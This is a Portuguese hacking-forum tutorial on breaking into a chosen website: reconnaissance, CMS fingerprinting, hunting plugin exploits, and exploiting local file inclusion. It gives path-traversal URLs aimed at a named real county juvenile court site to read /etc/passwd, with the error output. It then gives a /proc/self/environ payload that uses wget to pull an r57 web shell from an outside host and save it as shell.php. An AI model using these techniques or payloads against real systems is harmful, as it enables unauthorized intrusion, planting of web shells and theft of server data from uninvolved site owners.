COVIL HACKER

, ! .


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Pesquisa aberta do site de destino?


Pesquisa aberta do site de destino?

1 2 2

1

Hoje, tentarei explicar a vocês como o site de destino é hackeado, como pesquisá-lo, como analisá-lo. Primeiro, precisamos selecionar nosso site de destino e coletar informações.

Por informações, quero dizer; whois, varredura do servidor, script do site, mergulho de outro site no servidor para o alvo, pesquisa aberta e inserção de shell.

Você pode acessar o site Whois
Who.is e verificar o whois, para que possamos descobrir onde o site está hospedado e a quem pertence.

Site : http://www.who.is

https://forumupload.ru/uploads/001b/c9/09/2/t431057.jpg

Rastreamento de servidor Rastreamento

de servidor Se não conseguirmos encontrar uma vulnerabilidade no site de destino, aproveitaremos a vulnerabilidade de um site do servidor para nos permitir entrar no servidor, para que você possa chegar ao destino que desejamos.

Como escanear o servidor?

Existem sites de pesquisa para isso ou existem scripts ou ferramentas codificadas com PHP . Ferramenta (disponível em rar)



https://forumupload.ru/uploads/001b/c9/09/2/t362706.png

Qual é o script do site? Qual script é usado? Como eu sei? Primeiro precisamos olhar para a parte mais importante da url, Aceba. Quais são as extensões de arquivo do site? .php , .asp, .aspx Assim, aprendemos a linguagem do software do site à primeira vista. [Codificado com PHP, ou asp, ou aspx] Quando algumas pessoas entram no site, elas entendem diretamente qual script está instalado: Joomla, Powered by Seditio, etc. Powered by xxx é o script do site. Se o rodapé não disser algo como alimentado por xxx, exibimos o código-fonte. Como posso entender o script do site a partir dos códigos-fonte?



https://forumupload.ru/uploads/001b/c9/09/2/t280567.jpg

Em Wordpress -> wwwhedefsite.com/wp-content/images/uploads/isko.jpg wp-contents é um
dos caminhos de arquivo do wordpress então eu entendo que o site é wordpress (a coisa aqui é que você precisa saber os arquivos do wordpress ou outros scripts. .. ) Se o evento não for joomla, se não for wordpress, cotonti, se não seditio, se houver um ponto de interrogação em sua mente de que existem outros scripts, a única solução é copie /filepath/filepath/ do código-fonte e cole-o no google e pesquise. Assim, os caminhos de arquivo indexados o ajudarão a encontrar o nome do script mais rapidamente e você acelerará sua busca por exploits imediatamente. Extraímos o whois do nosso site de destino ,

Puxamos os sites do servidor, descobrimos qual é o script do site, é hora de procurar a vulnerabilidade do site.



Como pesquiso aberto no site de destino? Procuramos a vulnerabilidade no site de destino de acordo com o script, pesquisamos de acordo com a linguagem e os códigos do software. Por exemplo, temos um site baseado em wordpress , procuro exploits de acordo com essa versão do wordpress, existem até plugins no código-fonte, procuro exploits de acordo com esses plugins, o exploit não é difícil de usar. O mesmo se aplica a scripts como joomla, seditio, cotonti .



Como procuro exploits?

Wordpress.com/plugins/exploitsiolanplug/xskod/.. Procurando exploit baseado em exploitsiolanplug no evento aqui Google => exploitsiolanplug exploit Google => inurl: exploitsiolanplug exploit Isso permite que você procure exploits dos plugins que ele usou. Lembre-se, não há abertura apenas no plugin,

Métodos:

Pode haver vulnerabilidade de upload Vulnerabilidade

de injeção de SQL Vulnerabilidade de

RFI Vulnerabilidade de

Lfi Pode haver quebra de senha ao encontrar o caminho do administrador, todos eles se enquadram na categoria de pesquisa aberta no site. // Exemplos de vulnerabilidade de LFI Exploração de LFI Arquivo Index.php:


Rico (código BB):
<?php
include($_GET['sayfa'])
?>

index.php?page=../../../../../../../../../etc/passwd Exemplo: Site: http://www.belmontcountyjuvenilecourt.com/ Com o index2.php X-Bug Browser da ferramenta isko , bastará você selecionar o que precisa inserir na url e iniciar o bug, claro, sem a ferramenta.Os comandos são simples http://www. belmontcountyjuvenilecourt.com/index2.php?topic=../../etc /passwd


Rico (código BB):
Warning: include(includes/../../etc/passwd) [function.include]: failed to open stream: No such file or directory in/home/costinejuv/www/index2.php on line64

Recebemos o erro

Continuamos

http://www.belmontcountyjuvenilecourt.c … etc/passwd

Recebemos o mesmo erro novamente

Continuamos

http://www.belmontcountyjuvenilecourt. com/index2 .php?topic=../../../../etc/passwd

E a lista de senhas está aqui É simples amigos... O importante aqui é que você vai instalar um shell do



https://forumupload.ru/uploads/001b/c9/09/2/t78508.jpg

LFI vulnerabilidade e será mais fácil de hackear. Nosso

código é

proc/self/environ%00&cmd=wget Precisamos entrar https://shelladresi.com/r57.txt -Oshell.php

e carregar o shell (lembre-se, isso pode não funciona para cada lfi, não funcionou no site de exemplo que dei.)

0

2


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Pesquisa aberta do site de destino?


|